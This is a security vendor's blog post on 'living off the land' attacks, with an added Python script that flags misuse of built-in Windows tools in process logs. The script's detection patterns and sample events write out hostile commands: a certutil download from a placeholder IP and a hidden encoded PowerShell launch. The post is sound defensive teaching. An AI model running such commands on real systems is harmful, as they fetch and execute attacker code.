IronNet Blog

What are "living off the land" attacks?

Written by IronNet | Sep 29, 2020 5:40:50 PM

"Indirect attacks against weak links in the supply chain now account for 40 percent of security breaches," according to Accenture Security's State of Cybersecurity Report 2020. Companies across sectors have been shoring up their cybersecurity defenses with technologies such as firewalls, endpoint protection, and Network Detection and Response, but one area remains overlooked: securing the supply chain.

While the objectives of supply chain attacks differ, the tools, tactics, and procedures are usually no different from those of traditional cyber attacks. Understanding the most common attacks, however, lets you plan and prepare response plans.

One common tactic is called a "living off the land" attack (a fileless malware attack), and it has recently become more popular. It can best be described as gaining additional access using the tools that already exist in the computing environment, which makes detection and reconstruction of the compromise timeline increasingly difficult. Commonly targeted systems include IT/help desk tools, system patching infrastructure, security vulnerability scanners, and "system accounts" with global administrative permissions. Once the attacker has compromised these environments, they often have the access required to compromise the targeted systems and/or data undetected.

How to defend against a fileless malware attack

Creating an application safe list, logging, and behavioral detection, such as IronNet's Network Detection and Response solution IronDefense, are needed to stop these kinds of attacks. Common techniques are well documented by the LOLBAS project at https://lolbas-project.github.io/ and by MITRE ATT&CK at https://attack.mitre.org.
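The paragraph above names three controls: an application safe list, logging, and behavioral detection. The script below, an added example that is not IronNet's code or part of IronDefense, shows why the three belong together. It runs a per-host allowlist check and a few LOLBin behavioral heuristics over process-creation events. The allowlist, the argument patterns (modelled on the kind of entries LOLBAS documents), and the sample events are all constructed for this illustration; the IP address is from the RFC 5737 documentation range.

```python
"""Flag suspicious use of built-in binaries ("living off the land") in
process-creation telemetry. Added example, not IronNet's code; the
allowlist, patterns and events below are constructed for illustration."""
import re
from dataclasses import dataclass

# Hypothetical application safe list for a workstation: full image paths a
# host is expected to run. Anything else is a finding regardless of arguments.
WORKSTATION_ALLOWLIST = {
    r"c:\windows\explorer.exe",
    r"c:\windows\system32\cmd.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\microsoft office\root\office16\winword.exe",
    r"c:\windows\system32\certutil.exe",
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
    r"c:\windows\system32\rundll32.exe",
}

# Allowlisted-but-abusable binaries paired with argument patterns that are
# rarely legitimate on a workstation. The safe list alone cannot catch these,
# because the image itself is trusted; only behaviour distinguishes them.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "rundll32.exe": re.compile(r"javascript:|\bhttps?://", re.I),
    "mshta.exe": re.compile(r"\bhttps?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "powershell.exe": re.compile(
        r"-enc(odedcommand)?\b|downloadstring|\biex\b|bypass", re.I),
}

# Office applications spawning script hosts or shells is a classic chain
# from a malicious document into living-off-the-land tooling.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    host: str
    image: str
    reason: str
    severity: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path ('' for empty input)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict, allowlist=WORKSTATION_ALLOWLIST) -> list:
    """Return the findings for one process-creation event."""
    findings = []
    image = event["image"].lower()
    name = basename(image)
    parent = basename(event.get("parent", ""))
    cmd = event.get("cmdline", "")
    if image not in allowlist:
        findings.append(Finding(event["host"], image,
                                "image not on application allowlist", "medium"))
    pattern = LOLBIN_PATTERNS.get(name)
    if pattern and pattern.search(cmd):
        findings.append(Finding(event["host"], image,
                                f"LOLBin {name} with suspicious arguments", "high"))
    if parent in OFFICE_PARENTS and name in SHELLS:
        findings.append(Finding(event["host"], image,
                                f"{parent} spawned {name}", "high"))
    return findings


def scan(events, allowlist=WORKSTATION_ALLOWLIST) -> list:
    """Run analyze() over a batch of events and concatenate the findings."""
    out = []
    for event in events:
        out.extend(analyze(event, allowlist))
    return out


def summarize(findings) -> dict:
    """Count findings per severity, e.g. {'high': 3, 'medium': 1}."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample events in the shape of process-creation logs (not real
# telemetry). Event 4 is legitimate certutil use and must produce no finding.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n quarterly-report.docx"},
    {"host": "ws-01", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <constructed-base64-omitted>"},
    {"host": "ws-02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/x.txt C:\Users\Public\x.txt"},
    {"host": "ws-02", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Temp\installer.msi SHA256"},
    {"host": "ws-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe /silent"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host}: {f.reason} ({f.image})")
    print(summarize(scan(SAMPLE_EVENTS)))
```

On the sample batch the allowlist alone flags only the unknown binary in the user's temp directory, while the two certutil events are indistinguishable to it; the argument heuristic separates the download from the legitimate hash check, and the parent-process rule catches the Office-to-PowerShell chain. In production the allowlist would be generated per host role from a known-good baseline, and the patterns would be maintained as detection rules rather than hard-coded.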

Discover how to strengthen supply chain security in IronNet's latest white paper.